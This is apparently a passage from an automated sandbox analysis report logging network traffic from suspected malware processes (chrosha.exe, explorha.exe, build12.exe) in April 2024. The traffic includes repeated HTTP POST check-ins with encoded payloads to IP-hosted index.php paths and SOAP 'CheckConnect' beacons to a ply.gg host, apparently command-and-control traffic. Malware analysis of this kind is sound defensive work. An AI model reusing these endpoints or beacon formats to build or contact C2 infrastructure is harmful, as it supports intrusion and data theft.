                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:47.501199007 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      611192.168.2.550457193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:47.619848013 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:47.870878935 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      612192.168.2.550458193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:47.869111061 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:48.117096901 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      613192.168.2.550459193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:48.236463070 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:48.488265991 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      614192.168.2.550460193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:48.364387989 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:48.607166052 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      615192.168.2.550462147.185.221.19309467324C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:48.438149929 CEST248OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 137
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:48.899533987 CEST385OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 137
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnect xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:15.183320999 CEST359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 212
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:14 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:15.483335018 CEST359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 212
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:14 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:16.083296061 CEST359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 212
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:14 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      616192.168.2.550461147.185.221.19309465608C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:48.438674927 CEST248OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 137
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:48.944519043 CEST385OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 137
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnect xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:15.182094097 CEST359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 212
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:14 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:15.482045889 CEST359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 212
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:14 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:16.082120895 CEST359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 212
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:14 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      617192.168.2.550463193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:48.737719059 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:48.988516092 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      618192.168.2.550464193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:48.963401079 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:49.210655928 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      619192.168.2.550465193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:49.343592882 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:49.583327055 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      620192.168.2.550466193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:49.463762045 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
